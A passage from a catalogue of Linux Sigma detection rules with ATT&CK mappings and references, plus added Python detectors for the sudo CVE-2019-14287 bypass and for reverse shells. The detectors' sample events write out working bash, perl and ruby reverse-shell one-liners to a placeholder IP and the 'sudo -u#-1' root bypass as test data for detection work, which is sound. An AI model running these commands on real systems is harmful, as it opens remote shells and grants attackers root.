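    for path, hits in scan_file_events(SAMPLE_EVENTS):
        print(f"{path}: {', '.join(hits)}")
```

In production the writer process (the Image field) is what separates a package post-install script from an operator dropping a job by hand, so the exclusions belong on that field rather than on the path; the path list itself should stay broad.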

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors

The tag is: misp-galaxy:sigma-rules="Communication To Ngrok Tunneling Service - Linux"

Communication To Ngrok Tunneling Service - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 11573. Table References

Links

https://twitter.com/hakluke/status/1587733971814977537/photo/1

https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml

Linux Reverse Shell Indicator

Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

The tag is: misp-galaxy:sigma-rules="Linux Reverse Shell Indicator"

Linux Reverse Shell Indicator has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11574. Table References

Links

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

The tag is: misp-galaxy:sigma-rules="Linux Crypto Mining Pool Connections"

Linux Crypto Mining Pool Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 11575. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml

Sudo Privilege Escalation CVE-2019-14287

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

The tag is: misp-galaxy:sigma-rules="Sudo Privilege Escalation CVE-2019-14287"

Sudo Privilege Escalation CVE-2019-14287 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 11576. Table References

Links

https://twitter.com/matthieugarin/status/1183970598210412546

https://www.openwall.com/lists/oss-security/2019/10/14/1

https://access.redhat.com/security/cve/cve-2019-14287

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
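Both CVE-2019-14287 entries (the builtin-log variant above and this process_creation one) look for the same thing: a sudo invocation that names the target user as uid -1 or 4294967295, which sudo before 1.8.28 converted to uid 0, defeating a "(ALL, !root)" restriction. The checker below is an added Python illustration of that process_creation check and not the published Sigma rule, which matches on raw command-line substrings; it tokenises the command line so that the quoted and long-option spellings are caught too, deliberately does not parse clustered short options such as "-nu#-1", and runs only on constructed sample command lines.

```python
"""Illustrative process_creation check for the sudo bug in CVE-2019-14287.
Added example; not the published Sigma rule. Command lines are constructed."""
import posixpath
import shlex

# sudo versions before 1.8.28 converted a user id of -1, or its unsigned
# 32-bit form 4294967295, to uid 0, which let a user permitted to run a
# command as "ALL, !root" still obtain root with "-u#-1".
BYPASS_UIDS = {"-1", "4294967295"}


def sudo_user_arguments(argv: list[str]) -> list[str]:
    """Collect every value passed to sudo's -u / --user option.

    Handles '-u#-1', '-u #-1', '--user=#-1' and '--user #-1'. Clustered short
    options such as '-nu#-1' are deliberately not parsed here.
    """
    users = []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("-u", "--user"):
            if i + 1 < len(argv):
                users.append(argv[i + 1])
            i += 2
            continue
        if tok.startswith("--user="):
            users.append(tok[len("--user="):])
        elif tok.startswith("-u") and not tok.startswith("--"):
            users.append(tok[2:])
        i += 1
    return users


def is_cve_2019_14287_attempt(command_line: str) -> bool:
    """True when a sudo command line names uid -1 or 4294967295 via '#'."""
    try:
        argv = shlex.split(command_line)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = command_line.split()
    if not argv or posixpath.basename(argv[0]) != "sudo":
        return False
    return any(
        user.startswith("#") and user[1:] in BYPASS_UIDS
        for user in sudo_user_arguments(argv)
    )


def scan_process_events(events: list[dict]) -> list[str]:
    """Return the CommandLine of every constructed event that looks like an attempt."""
    return [e["CommandLine"] for e in events if is_cve_2019_14287_attempt(e["CommandLine"])]


# Constructed sample process_creation events, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/sudo", "CommandLine": "sudo -u#-1 /bin/bash"},
    {"Image": "/usr/bin/sudo", "CommandLine": "/usr/bin/sudo -u '#4294967295' id"},
    {"Image": "/usr/bin/sudo", "CommandLine": "sudo --user=#-1 id"},
    {"Image": "/usr/bin/sudo", "CommandLine": "sudo -u root id"},      # legitimate
    {"Image": "/usr/bin/sudo", "CommandLine": "sudo -u#1000 id"},      # legitimate numeric uid
    {"Image": "/bin/ls", "CommandLine": "ls -u#-1"},                   # not sudo at all
]

if __name__ == "__main__":
    for cmd in scan_process_events(SAMPLE_EVENTS):
        print("CVE-2019-14287 attempt:", cmd)
```

Matching on the numeric bypass values rather than on any "#" uid keeps ordinary "sudo -u#1000" usage out of the alert stream; the patched sudo rejects the two bypass values, so a hit on a current system still indicates someone probing for the bug.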

Decode Base64 Encoded Text

Detects usage of base64 utility to decode arbitrary base64-encoded text

The tag is: misp-galaxy:sigma-rules="Decode Base64 Encoded Text"

Decode Base64 Encoded Text has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11577. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml

Linux Remote System Discovery

Detects the enumeration of other remote systems.

The tag is: misp-galaxy:sigma-rules="Linux Remote System Discovery"

Linux Remote System Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 11579. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml

Disabling Security Tools

Detects disabling security tools

The tag is: misp-galaxy:sigma-rules="Disabling Security Tools"

Disabling Security Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11580. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml

Triple Cross eBPF Rootkit Execve Hijack

Detects execution of the file "execve_hijack", which is used by the Triple Cross rootkit as a way to elevate privileges

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Execve Hijack"

Table 11581. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml

Vim GTFOBin Abuse - Linux

Detects usage of "vim" and its siblings as a GTFOBin to execute and proxy command and binary execution

The tag is: misp-galaxy:sigma-rules="Vim GTFOBin Abuse - Linux"

Vim GTFOBin Abuse - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11582. Table References

Links

https://gtfobins.github.io/gtfobins/vimdiff/

https://gtfobins.github.io/gtfobins/rvim/

https://gtfobins.github.io/gtfobins/vim/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml

Interactive Bash Suspicious Children

Detects suspicious interactive bash as a parent to rather uncommon child processes

The tag is: misp-galaxy:sigma-rules="Interactive Bash Suspicious Children"

Interactive Bash Suspicious Children has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11584. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml

File and Directory Discovery - Linux

Detects usage of system utilities to discover files and directories

The tag is: misp-galaxy:sigma-rules="File and Directory Discovery - Linux"

File and Directory Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11585. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml

OS Architecture Discovery Via Grep

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

The tag is: misp-galaxy:sigma-rules="OS Architecture Discovery Via Grep"

OS Architecture Discovery Via Grep has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11586. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml

Potential Discovery Activity Using Find - Linux

Detects usage of "find" binary in a suspicious manner to perform discovery

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Using Find - Linux"

Potential Discovery Activity Using Find - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11587. Table References

Links

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml

Clipboard Collection with Xclip Tool

Detects attempts to collect data stored in the clipboard from users with the usage of the xclip tool. Xclip has to be installed. Using this rule on servers is highly recommended; on user workstations clipboard utilities see heavy legitimate use.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection with Xclip Tool"

Clipboard Collection with Xclip Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11588. Table References

Links

https://www.packetlabs.net/posts/clipboard-data-security/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml

Linux Package Uninstall

Detects Linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

The tag is: misp-galaxy:sigma-rules="Linux Package Uninstall"

Linux Package Uninstall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 11589. Table References

Links

https://linuxhint.com/uninstall-debian-packages/

https://linuxhint.com/uninstall_yum_package/

https://sysdig.com/blog/mitre-defense-evasion-falco

https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml

Local System Accounts Discovery - Linux

Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

The tag is: misp-galaxy:sigma-rules="Local System Accounts Discovery - Linux"

Local System Accounts Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11590. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on Linux systems

The tag is: misp-galaxy:sigma-rules="Linux Recon Indicators"

Linux Recon Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11591. Table References

Links

https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml

Linux HackTool Execution

Detects known hacktool execution based on image name.

The tag is: misp-galaxy:sigma-rules="Linux HackTool Execution"

Linux HackTool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

Table 11592. Table References

Links

https://github.com/t3l3machus/Villain

https://github.com/Pennyw0rth/NetExec/

https://github.com/pathtofile/bad-bpf

https://github.com/Gui774ume/ebpfkit

https://github.com/carlospolop/PEASS-ng

https://github.com/t3l3machus/hoaxshell

https://github.com/1N3/Sn1per

https://github.com/Ne0nd0g/merlin

https://github.com/HavocFramework/Havoc

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml

Chmod Suspicious Directory

Detects chmod targeting files in abnormal directory paths.

The tag is: misp-galaxy:sigma-rules="Chmod Suspicious Directory"

Chmod Suspicious Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11593. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml

Python Spawning Pretty TTY

Detects python spawning a pretty tty which could be indicative of potential reverse shell activity

The tag is: misp-galaxy:sigma-rules="Python Spawning Pretty TTY"

Python Spawning Pretty TTY has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11594. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml

Flush Iptables Ufw Chain

Detects use of iptables to flush all firewall rules, tables and chains and allow all network traffic

The tag is: misp-galaxy:sigma-rules="Flush Iptables Ufw Chain"

Flush Iptables Ufw Chain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11595. Table References

Links

https://blogs.blackberry.com/

https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html

https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml

Potential Perl Reverse Shell Execution

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

The tag is: misp-galaxy:sigma-rules="Potential Perl Reverse Shell Execution"

Table 11596. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml

Atlassian Confluence CVE-2022-26134

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

The tag is: misp-galaxy:sigma-rules="Atlassian Confluence CVE-2022-26134"

Atlassian Confluence CVE-2022-26134 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11597. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml

Potential Xterm Reverse Shell

Detects usage of "xterm" as a potential reverse shell tunnel

The tag is: misp-galaxy:sigma-rules="Potential Xterm Reverse Shell"

Potential Xterm Reverse Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11598. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml

Suspicious Curl File Upload - Linux

Detects a suspicious curl process start that adds a file to a web request

The tag is: misp-galaxy:sigma-rules="Suspicious Curl File Upload - Linux"

Suspicious Curl File Upload - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11599. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file

https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76

https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

https://curl.se/docs/manpage.html

https://twitter.com/d1r4c/status/1279042657508081664

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml

Potential Ruby Reverse Shell

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

The tag is: misp-galaxy:sigma-rules="Potential Ruby Reverse Shell"

Table 11600. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml
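The reverse-shell entries above (Linux Reverse Shell Indicator, Python Spawning Pretty TTY, Potential Perl Reverse Shell Execution, Potential Xterm Reverse Shell and Potential Ruby Reverse Shell) each key on one interpreter's way of wiring a shell to a socket. The matcher below is an added Python illustration that runs all five checks over constructed process_creation events; it is not the published rules' own selections. The regexes and the "-e"-flag requirement for the perl and ruby cases are assumptions chosen to mirror the descriptions (the bash case matches the "/dev/tcp/IP/PORT" redirection quoted above on the command line rather than on a network_connection event), and the field names Image and CommandLine are the Sysmon-style names.

```python
"""Illustrative reverse-shell indicator matcher covering the bash, python,
perl, ruby and xterm entries above. Added example, not the published Sigma
rules' own selections. Events are constructed sample process_creation data."""
import posixpath
import re
import shlex

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# (label, image-name prefixes or None for any image, CommandLine regex,
#  whether an inline-script flag such as -e must also be present)
REVERSE_SHELL_RULES = [
    # bash network redirection: bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
    ("bash_dev_tcp", None,
     re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/\d{1,5}"), False),
    # python pty upgrade used to get an interactive tty over the socket
    ("python_pty_spawn", ("python",), re.compile(r"\bpty\.spawn\("), False),
    # perl -e one-liners that open a socket
    ("perl_socket", ("perl",),
     re.compile(r"\bsocket\(|\buse\s+Socket\b", re.IGNORECASE), True),
    # ruby -e one-liners using TCPSocket / Socket
    ("ruby_socket", ("ruby",), re.compile(r"\bTCPSocket\b|\bSocket\b"), True),
    # xterm pointed at a remote X display
    ("xterm_display", ("xterm",),
     re.compile(r"-display\s+" + IPV4 + r":\d+"), False),
]


def detect_reverse_shell(event: dict) -> list[str]:
    """Return the labels of every rule the event matches."""
    command_line = event.get("CommandLine", "")
    image = posixpath.basename(event.get("Image", ""))
    try:
        argv = shlex.split(command_line)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = command_line.split()
    # Assumption: the inline-code flag appears as '-e' or glued to the script
    # ('-e...'); long '--' options are ignored.
    inline_script = any(
        tok.startswith("-e") and not tok.startswith("--") for tok in argv[1:]
    )
    hits = []
    for label, prefixes, pattern, needs_inline in REVERSE_SHELL_RULES:
        if prefixes and not image.startswith(prefixes):
            continue
        if needs_inline and not inline_script:
            continue
        if pattern.search(command_line):
            hits.append(label)
    return hits


def scan_process_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Keep (CommandLine, labels) for every event that matched at least one rule."""
    results = []
    for event in events:
        hits = detect_reverse_shell(event)
        if hits:
            results.append((event["CommandLine"], hits))
    return results


# Constructed sample events, not captured telemetry. The IP 10.0.0.1 is the
# placeholder used in the description above.
SAMPLE_EVENTS = [
    {"Image": "/bin/bash", "CommandLine": "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"},
    {"Image": "/usr/bin/python3", "CommandLine": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"Image": "/usr/bin/perl", "CommandLine": "perl -e 'use Socket;$i=\"10.0.0.1\";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in($p,inet_aton($i)));exec(\"/bin/sh -i\");'"},
    {"Image": "/usr/bin/ruby", "CommandLine": "ruby -rsocket -e 'f=TCPSocket.open(\"10.0.0.1\",4242).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"},
    {"Image": "/usr/bin/xterm", "CommandLine": "xterm -display 10.0.0.1:1"},
    {"Image": "/usr/bin/python3", "CommandLine": "python3 manage.py runserver"},  # benign
    {"Image": "/usr/bin/perl", "CommandLine": "perl -e 'print 1'"},               # benign -e
    {"Image": "/usr/bin/ruby", "CommandLine": "ruby server.rb"},                  # no -e
]

if __name__ == "__main__":
    for cmd, hits in scan_process_events(SAMPLE_EVENTS):
        print(f"{', '.join(hits)}: {cmd}")
```

Requiring the inline-code flag for perl and ruby is what keeps ordinary script execution ("ruby server.rb") quiet even when the script itself opens sockets; the trade-off is that an attacker who writes the one-liner to disk first is only caught by the bash and xterm patterns or by a separate file_event rule.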

Apt GTFOBin Abuse - Linux

Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution

The tag is: misp-galaxy:sigma-rules="Apt GTFOBin Abuse - Linux"

Apt GTFOBin Abuse - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11601. Table References

Links

https://gtfobins.github.io/gtfobins/apt-get/

https://gtfobins.github.io/gtfobins/apt/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml

User Has Been Deleted Via Userdel

Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

The tag is: misp-galaxy:sigma-rules="User Has Been Deleted Via Userdel"

User Has Been Deleted Via Userdel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11602. Table References

Links

https://www.cyberciti.biz/faq/linux-remove-user-command/

https://linuxize.com/post/how-to-delete-group-in-linux/

https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/

https://linux.die.net/man/8/userdel

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml

System Information Discovery

Detects system information discovery commands

The tag is: misp-galaxy:sigma-rules="System Information Discovery"

System Information Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11603. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaissance tools. These tools can be used, for example, for the enumeration of local or remote network services.

The tag is: misp-galaxy:sigma-rules="Linux Network Service Scanning Tools Execution"

Linux Network Service Scanning Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11604. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/Tib3rius/AutoRecon

https://github.com/projectdiscovery/naabu

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml

Linux Crypto Mining Indicators

Detects command line parameters or strings often used by crypto miners

The tag is: misp-galaxy:sigma-rules="Linux Crypto Mining Indicators"

Linux Crypto Mining Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 11605. Table References

Links

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml

Terminate Linux Process Via Kill

Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.

The tag is: misp-galaxy:sigma-rules="Terminate Linux Process Via Kill"

Terminate Linux Process Via Kill has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11606. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://www.cyberciti.biz/faq/how-force-kill-process-linux/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml

DD File Overwrite

Detects potential overwriting and deletion of a file using DD.

The tag is: misp-galaxy:sigma-rules="DD File Overwrite"

DD File Overwrite has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11607. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml

Suspicious Package Installed - Linux

Detects installation of suspicious packages using system installation utilities

The tag is: misp-galaxy:sigma-rules="Suspicious Package Installed - Linux"

Suspicious Package Installed - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 11609. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml

Scheduled Cron Task/Job - Linux

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

The tag is: misp-galaxy:sigma-rules="Scheduled Cron Task/Job - Linux"

Scheduled Cron Task/Job - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11610. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml

System Network Connections Discovery - Linux

Detects usage of system utilities to discover system network connections

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery - Linux"

System Network Connections Discovery - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

